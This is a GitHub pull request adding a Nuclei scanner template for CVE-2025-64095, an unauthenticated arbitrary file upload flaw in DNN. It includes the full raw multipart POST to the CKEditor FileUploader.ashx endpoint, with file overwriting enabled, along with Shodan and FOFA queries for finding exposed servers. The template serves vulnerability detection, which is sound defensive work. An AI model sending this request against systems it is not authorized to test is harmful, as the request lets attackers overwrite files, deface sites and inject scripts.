Skip to content

CVE-2025-64095 - DNN - Unrestricted Arbitrary File Upload #13795

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Nov 3, 2025
Merged

CVE-2025-64095 - DNN - Unrestricted Arbitrary File Upload #13795

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
78 changes: 78 additions & 0 deletions http/cves/2025/CVE-2025-64095.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,78 @@
id: CVE-2025-64095

info:
name: DNN - Unrestricted Arbitrary File Upload
author: DhiyaneshDk,pussycat0x
severity: critical
description: |
DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.
impact: |
Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.
remediation: |
Update to version 10.1.1 or later.
reference:
- https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload
metadata:
verified: true
max-request: 1
vendor: dnnsoftware
product: dotnetnuke
shodan-query:
- "Set-Cookie: dnn_IsMobile"
- http.favicon.hash:-1465479343
fofa-query:
- app="dotnetnuke"
- "Set-Cookie: dnn_IsMobile"
- icon_hash="-1465479343"
tags: cve,cve2025,intrusive,file-upload,dnn

variables:
filename: "{{to_lower(rand_text_alpha(5))}}"

http:
- raw:
- |
POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3

--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="file"; filename="{{filename}}.png"
Content-Type: image/png

{{randstr}}
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="storageFolderID"

1
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="portalID"

0
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="overrideFiles"

1
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="mode"

Default
--------------------------7RKjWLYyrhvUn2AA31fJQ3--

matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"group"'
- 'delete_type'
condition: and

- type: word
part: content_type
words:
- "text/plain"

- type: status
status:
- 200
Loading